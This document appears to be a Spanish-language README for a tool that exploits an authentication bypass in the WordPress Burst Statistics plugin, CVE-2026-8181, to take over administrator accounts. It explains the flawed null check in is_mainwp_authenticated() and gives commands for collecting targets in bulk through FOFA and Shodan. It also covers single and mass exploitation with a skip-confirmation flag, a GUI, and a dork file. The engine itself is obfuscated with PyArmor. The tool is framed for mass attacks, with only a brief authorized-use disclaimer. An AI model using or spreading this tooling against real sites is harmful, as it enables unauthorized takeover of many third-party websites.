
CVE-2026-8181 — Bypass de autenticación del plugin Burst Statistics de WordPress (CVSS 9.8) que permite la toma de control de la cuenta de administrador. Escáner masivo con integración de FOFA/Shodan y GUI moderna.
CVSS 9.8 (Critical) — Bypass de autenticación para la toma de control de la cuenta de administrador
CVE-2026-8181 es una vulnerabilidad de Authentication Bypass en el plugin de WordPress Burst Statistics versiones 3.4.0 a 3.4.1.1. Este plugin es utilizado por 200.000+ sitios de WordPress como una alternativa a Google Analytics que respeta la privacidad.
Esta vulnerabilidad permite a un atacante sin autenticación que conozca el nombre de usuario admin:
La función is_mainwp_authenticated() en class-mainwp-proxy.php falla al validar el valor de retorno de wp_authenticate_application_password(). Esta función devuelve null (no WP_Error) cuando se invoca fuera del contexto de la API REST, y el código solo comprueba is_wp_error(). Como null no es WP_Error, la autenticación se considera exitosa.
# 1. Clone repository
git clone https://github.com/YOUR_USERNAME/CVE-2026-8181.git
cd CVE-2026-8181
# 2. Install dependencies
py -3.11 -m pip install -r requirements.txt
# 3. Siapkan .env (untuk scan via FOFA / Shodan)
echo [email protected] > .env
echo FOFA_KEY=your_fofa_key >> .env
echo SHODAN_KEY=your_shodan_key >> .env
# 4. Jalankan (pilih salah satu):
# Modern GUI (recommended)
py -3.11 gui_modern.py
# Atau double-click run.bat
run.bat
# Atau CLI langsung exploit satu target
py -3.11 CVE-2026-8181.py -t https://target.com -u admin --no-confirm
# Atau exploit massal dari file
py -3.11 CVE-2026-8181.py -l targets_output.txt -u admin --no-confirm
# Atau scan target dulu, baru exploit
py -3.11 finder.py --file list.txt
py -3.11 CVE-2026-8181.py -l targets_output.txt -u admin --no-confirm
Haz doble clic en run.bat o ejecuta:
py -3.11 gui_modern.py

Vista de la GUI moderna de CVE-2026-8181 con 3 pestañas
En la pestaña Scan: elige la fuente de objetivos (FOFA/Shodan desde .env, archivo o manual) → haz clic en SCAN TARGETS En la pestaña Exploit: introduce el nombre de usuario admin → haz clic en EXPLOIT

La herramienta encuentra objetivos vulnerables y está lista para explotarlos
Si el exploit tiene éxito, el atacante obtiene acceso total como administrador:

Panel de administración de WordPress después de una explotación exitosa
CVE-2026-8181/
├── CVE-2026-8181.py # Main exploit engine (PyArmor)
├── gui_modern.py # Modern GUI wrapper (recommended)
├── finder.py # Target scanner (FOFA / Shodan / File)
├── run.bat # One-click launcher
├── requirements.txt # Python dependencies
├── .env # API keys (gitignored)
├── .gitignore
├── Dork.txt # Google Dork
├── pyarmor_runtime_000000/ # PyArmor runtime (Python 3.11)
├── system/ # Source modules (obfuscated)
└── img/ # Screenshots tutorial
├── 1.png
├── 2.png
└── 3.png
.env.envSolo para fines educativos y de pruebas de penetración autorizadas. El uso sin permiso en sistemas que no te pertenecen es ilegal. Úsalo únicamente en sitios que te pertenezcan o para los que tengas autorización por escrito.
| Flag | Descripción |
|---|
-t, --target | URL del objetivo (individual) |
-l, --list | Archivo con la lista de objetivos |
-u, --username | Nombre de usuario admin (por defecto: admin) |
-T, --threads | Número de hilos (por defecto: 10) |
-o, --output | Archivo de salida de resultados |
-v, --verbose | Salida de depuración |
--timeout | Tiempo de espera de la petición (segundos) |
--no-confirm | Omitir confirmación |